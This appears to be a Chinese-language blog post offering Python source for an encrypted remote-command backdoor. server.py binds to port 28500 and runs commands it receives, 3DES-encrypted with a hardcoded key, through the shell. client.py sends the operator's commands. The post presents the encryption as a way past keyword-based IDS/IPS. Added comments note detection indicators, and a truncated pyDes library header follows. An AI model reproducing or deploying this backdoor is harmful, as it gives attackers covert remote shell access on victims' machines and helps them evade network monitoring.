python后门_python加密通讯后门

对通讯内容加密后,可以绕过一些靠匹配数据包关键字来检测的 IPS 和 IDS,这里是一个简单的 demo。需要注意,这只对基于载荷关键字的规则有效:下面代码中写死的端口、密钥和 IV,以及服务端进程派生 shell 子进程的行为,仍然是可以检测的特征。

client.py

[php]

# client

import socket

import time

import binascii

import base64

import pyDes

import sys

#use des
# Shared 3DES-CBC parameters, stored as hex text and unhexlified by the
# helpers below. The IV decodes to 8 bytes; pyDes documents 16- or 24-byte
# keys for triple DES.
# Defender note: server.py on this page carries the same two literals, so the
# channel relies on one static secret embedded in both scripts. Anyone who
# recovers either file can decrypt captured sessions, and the literal hex
# strings can serve as static indicators when hunting for copies of this demo.
iv = '2132435465768797'
key = 'aa000000000000000000000002200000000000aa0000000d'
#data = "afuckfucdfadf"

#des

def encrypt(iv, key, data):
    """Encrypt *data* with 3DES-CBC (PKCS5 padding) and return it as base64.

    *iv* and *key* are hex text and are converted to raw bytes before use.

    Defender note: every call on this page passes the module-level ``iv`` and
    ``key``, so equal plaintexts always produce equal ciphertexts, and the
    traffic can be decrypted by whoever holds the script.
    ``base64.encodestring`` yields line-wrapped base64 ending in a newline,
    which is the form that appears on the wire.
    """
    raw_iv = binascii.unhexlify(iv)
    raw_key = binascii.unhexlify(key)
    cipher = pyDes.triple_des(
        raw_key, pyDes.CBC, raw_iv, pad=None, padmode=pyDes.PAD_PKCS5
    )
    return base64.encodestring(cipher.encrypt(data))

def decrypt(iv, key, data):
    """Base64-decode *data*, then decrypt it with 3DES-CBC and PKCS5 unpadding.

    *iv* and *key* are hex text and are converted to raw bytes before use.
    This is the inverse of ``encrypt`` in this script and uses the same
    static parameters.
    """
    raw_iv = binascii.unhexlify(iv)
    raw_key = binascii.unhexlify(key)
    cipher = pyDes.triple_des(
        raw_key, pyDes.CBC, raw_iv, pad=None, padmode=pyDes.PAD_PKCS5
    )
    return cipher.decrypt(base64.decodestring(data))

# Operator-side loop: connect to the given host/port, print the greeting, then
# send each typed line encrypted and print the decrypted reply.
# NOTE(review): the page lost all indentation; the nesting below is
# reconstructed from statement order and should be checked against a clean copy.
if __name__ == '__main__':
    # Python 2 print statements. argv is read before the usage hint is
    # printed, so a missing argument raises IndexError first.
    print sys.argv[1]+sys.argv[2]
    print 'client.py ip port'
    address = (sys.argv[1], int(sys.argv[2]))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(address)
    # The server speaks first; its greeting is decrypted with the static key/IV.
    data =decrypt(iv,key,s.recv(512))
    print data
    while True:
        commond=raw_input()
        # Every line, including the quit marker 'q', is sent encrypted.
        s.send(encrypt(iv,key,commond))
        time.sleep(1)
        if(commond=='q'):
            exit()
        # One recv() call is treated as one complete base64 message.
        data = decrypt(iv,key,s.recv(9999))
        print data.rstrip('\n')
    # Presumably never reached: the loop above only ends through exit().
    s.close()

server.py

# server

import socket

import subprocess

import os

import time

import binascii

import base64

import pyDes

##use des
# Same hex-encoded IV and key literals as client.py on this page; the IV
# decodes to 8 bytes.
# Defender note: because both values are fixed in the script, a recovered copy
# of this file is enough to decrypt captured traffic for incident response,
# and the literals themselves are usable as static indicators.
iv = '2132435465768797'
key = 'aa000000000000000000000002200000000000aa0000000d'
#data = "aaaaaaaaaaaaaaaaaa"

##use des

def encrypt(iv, key, data):
    """Return *data* encrypted with 3DES-CBC (PKCS5 padding), base64-encoded.

    *iv* and *key* are hex text; both are unhexlified before the cipher is
    built.

    Defender note: the only values passed in this script are the module-level
    ``iv`` and ``key``, so a given plaintext always maps to the same
    ciphertext. ``base64.encodestring`` produces line-wrapped output that ends
    with a newline.
    """
    iv_bytes = binascii.unhexlify(iv)
    key_bytes = binascii.unhexlify(key)
    des3 = pyDes.triple_des(
        key_bytes, pyDes.CBC, iv_bytes, pad=None, padmode=pyDes.PAD_PKCS5
    )
    ciphertext = des3.encrypt(data)
    return base64.encodestring(ciphertext)

def decrypt(iv, key, data):
    """Return the plaintext of base64 text *data* (3DES-CBC, PKCS5 unpadding).

    *iv* and *key* are hex text; both are unhexlified before the cipher is
    built. The input is whatever a single ``recv`` returned in ``main``.
    """
    iv_bytes = binascii.unhexlify(iv)
    key_bytes = binascii.unhexlify(key)
    des3 = pyDes.triple_des(
        key_bytes, pyDes.CBC, iv_bytes, pad=None, padmode=pyDes.PAD_PKCS5
    )
    ciphertext = base64.decodestring(data)
    return des3.decrypt(ciphertext)

# Greeting text that main() places at the start of the first message.
banner="by \r\n"
# Listens on every interface, TCP port 28500 (a literal in this sample).
# Defender note: a Python interpreter holding a listening socket on this port
# is a host-side indicator for the script as published here.
address = ('0.0.0.0', 28500)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s = socket.socket()
s.bind(address)
s.listen(5)
# These statements sit at module level, outside the __main__ guard, so the
# bind and the blocking accept() happen as soon as the file is loaded. Only
# this first accepted connection (ss) is used by the rest of the script.
ss, addr = s.accept()

# Handle one decrypted line received from the peer.
#   "q" (any case)     -> close the listening socket and exit the process
#   starts with "cd"   -> change the working directory
#   anything else      -> run it through os.popen and capture its output
# Returns [output, current_directory].
#
# Defender note: the string comes straight off the network and the only gate
# is knowledge of the static key. os.popen hands it to the system shell, so
# every command appears as a shell child of the Python process; process
# creation telemetry shows this activity even though the payload on the wire
# is encrypted.
#
# NOTE(review): indentation was lost on the page; the nesting is reconstructed.
def cmd(data,pwds):
    if "q" == data.lower():
        s.close()
        #break;
        exit(1)
    else:
        # Prefix test only: any line beginning with "cd" takes this branch.
        if data.startswith('cd'):
            print '2 pwd is'+pwds
            # Appends the text after the first three characters directly to the
            # tracked directory, with newlines removed. `str` shadows the builtin.
            str=pwds+data[3:].replace('\n','')
            print 'str is '+str
            os.chdir(str)
            pwds=os.getcwd()
            result=['',pwds]
        else:
            # Shell execution of the received text; its output is read in full.
            r=os.popen(data).read()
            result=[r,pwds]
    return result

# Service loop for the single accepted connection (ss): send an encrypted
# greeting, then repeatedly decrypt one received message, pass it to cmd(),
# and send back the encrypted output followed by the current directory.
#
# Defender note: the greeting starts with banner + '\r\npath is ', a fixed
# 15-character prefix. With the static key and IV, the first 8-byte CBC block
# therefore encrypts to the same bytes on every run, so the opening of the
# first server-to-client message is constant for this sample.
#
# NOTE(review): indentation was lost on the page; the nesting is reconstructed.
def main():
    pwds=os.getcwd()
    ss.send(encrypt(iv,key,banner+'\r\npath is '+pwds))
    while True:
        # One recv() of up to 512 bytes is treated as one complete message.
        ra =decrypt(iv,key,ss.recv(512))
        [r,pwds]=cmd(ra,pwds)
        ss.send(encrypt(iv,key,r+pwds))
    # Presumably never reached: the loop has no break and cmd() ends the
    # process itself on "q".
    ss.close()
    s.close()

# Only the service loop is guarded here; the socket bind, listen and accept
# earlier in the file run at module level before this check.
if __name__ == "__main__":
    main()

用的是这个库http://twhiteman.netfirms.com/des.html

pyDes.py

#############################################################################

# Documentation #

#############################################################################

# Author: Todd Whiteman

# Date: 16th March, 2009

# Verion: 2.0.0

# License: Public Domain - free to do as you wish

# Homepage: http://twhiteman.netfirms.com/des.html

#

# This is a pure python implementation of the DES encryption algorithm.

# It's pure python to avoid portability issues, since most DES

# implementations are programmed in C (for performance reasons).

#

# Triple DES class is also implemented, utilising the DES base. Triple DES

# is either DES-EDE3 with a 24 byte key, or DES-EDE2 with a 16 byte key.

#

# See the README.txt that should come with this python module for the

# implementation methods used.

#

# Thanks to:

# * David Broadwell for ideas, comments and suggestions.

# * Mario Wolff for pointing out and debugging some triple des CBC errors.

# * Santiago Palladino for providing the PKCS5 padding technique.

# * Shaya for correcting the PAD_PKCS5 triple des CBC errors.

#

"""A pure python implementation of the DES and TRIPLE DES encryption algorithms.

Class initialization

--------------------

pyDes.des(key, [mode], [IV], [pad], [padmode])

pyDes.triple_des(key, [mode], [IV], [pad], [padmode])

key -> Bytes containing the encryption key. 8 bytes for DES, 16 or 24 bytes

for Triple DES

mode -> Optional argument for encryption type, can be either

pyDes.ECB (Electronic Code Book) or pyDes.CBC (Cypher Block Chaining)

IV -> Optional Initial Value bytes, must be supplied if using CBC mode.

Length must be 8 bytes.

pad -> Optional argument, set the pad character (PAD_NORMAL) to use during

all encrypt/decrpt operations done with this instance.

padmode -> Optional argument, set the padding mode (PAD_NORMAL or PAD_PKCS5)

to use during all encrypt/decrpt operations done with this instance.

I recommend to use PAD_PKCS5 padding, as then you never need to worry about any

padding issues, as the padding can be removed unambiguously upon decrypting

data that was encrypted using PAD_PKCS5 padmode.

Common methods

--------------

encrypt(data, [pad], [padmode])

decrypt(data, [pad], [padmode])

data -> Bytes to be encrypted/decrypted

pad -> Optional argument. Only when using padmode of PAD_NORMAL. For

encryption, adds this characters to the end of the data block when

data is not a multiple of 8 bytes. For decryption, will remove the

trailing characters that match this pad character from the last 8

bytes of the unencrypted data block.

padmode -> Optional argument, set the padding mode, must be one of PAD_NORMAL

or PAD_PKCS5). Defaults to PAD_NORMAL.

Example

-------

from pyDes import *

data = "Please encrypt my data"

k = des("DESCRYPT", CBC, "\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)

# For Python3, you'll need to use bytes, i.e.:

# data = b"Please encrypt my data"

# k = des(b"DESCRYPT", CBC, b"\0\0\0\0\0\0\0\0", pad=None, padmode=PAD_PKCS5)

d = k.encrypt(data)

print "Encrypted: %r" % d

print "Decrypted: %r" % k.decrypt(d)

assert k.decrypt(d, padmode=PAD_PKCS5
